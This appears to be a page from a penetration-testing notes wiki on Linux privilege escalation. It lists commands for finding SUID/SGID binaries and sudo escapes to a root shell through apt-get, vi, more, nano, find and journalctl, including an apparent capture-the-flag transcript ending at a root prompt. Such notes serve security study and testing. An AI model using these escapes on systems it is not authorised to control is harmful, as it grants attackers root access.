SUID/SGID

SUID/SGID

find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Enum SUID / SGID - Find

find /etc -perm 777
find / -user username

# Find files with SUID configured
find /usr/bin -perm 4755

# Find files with SGID configured
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
find /etc -perm /1444

Setuid

The setuid bit appears as an s.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Setgid

find / -uid 0 -perm -6000 -type f 2>/dev/null
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine

GTFOBins

apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)

Vi

sudo vi
:!sh

More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

Dans vim
:set shell=/bin/sh
:shell

Nano

./nano
^R^X
reset; sh 1>&0 2>&0

Find

find . -exec /bin/sh -p \; -quit`

Journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls

Systemctl

Tool

PreviousEscaping Restricted ShellsNextSudo Rights Abuse

Last updated